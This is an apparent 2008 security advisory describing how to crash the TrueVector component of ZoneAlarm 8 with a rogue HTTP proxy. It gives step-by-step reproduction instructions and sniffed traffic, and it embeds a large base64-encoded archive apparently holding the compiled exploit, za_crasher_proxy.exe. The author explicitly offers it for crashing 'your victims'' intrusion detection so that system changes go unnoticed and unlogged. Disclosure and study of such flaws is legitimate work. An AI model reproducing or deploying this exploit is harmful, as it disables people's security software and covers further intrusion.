Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)

2008-09-30T00:00:00
ID SECURITYVULNS:DOC:20625
Type securityvulns
Reporter Securityvulns
Modified 2008-09-30T00:00:00

Description

Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)

  • Keep ZoneALarm 8 running with vsmon.exe running (which runs by default)

  • On System A : Run the rogue proxy (attached) za_crasher_proxy.exe and set a port number (eg: za_crasher_proxy.exe 5938)

  • On System B : Use Internet Explorer 6 and set proxy settings as IP of System A and port 5938 for HTTP connections By default IE 6 has homepage as http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome Leave it unchanged.

  • Keep za_crasher_proxy.exe running on System A.

  • Launch IE on System B. It will goto http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome

  • Stop it and type any other web URL in the address bar. IE tries to locate that URL via the set proxy IP and port.

Sniffed Output :

00000000 17 24 0A 20 00 1A A9 D8 81 88 13 80 00 00 00 00 .$. ....

.......

00000010 00 01 00 00 00 0F 00 00 00 00 00 00 00 00 00 00 ........

.......

00000020 00 00 00 00 00 .....

CONNECT 208.185.174.65:443 HTTP/1.0 Host: 208.185.174.65:443 Proxy-Connection: Keep-Alive Accept-Encoding: gzip Accept: / Content-Type: text/plain User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2

  • ZoneAlarm 8's TrueVector Component crashes with a message box, minidump file in Temp and on closing the message box, it restarts after a few moments

  • ZoneAlarm leaves the system unprotected (HIDS module alone) till the time TrueVector component is back.

  • Demonstration Video links :

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_without_za8_running.rar

http://www.fileden.com/files/2008/9/18/2104312/rogue_proxy_crashing_za8issuite.rar

ZoneAlarm 8 Internet Security Suite Crasher (Rogue Proxy)crashes ZA8 on IE 6 WIndows XP SP3.

Can be used to used as a rogue proxy (3128,8080,etc.) to crash your victims' ZA HIDS component for a few moments rendering your victim vulnerable to unnoticed, unlogged system changes.

[ Not tested with other browsers. Might work on IE7,8 and others. Seems to be a Browser Independent bug ]

za_crasher_proxy.b64 (Base64 Encoded File)

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 0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA=

Discovered on 9:48 PM 9/8/2008

-- QUAKERDOOMER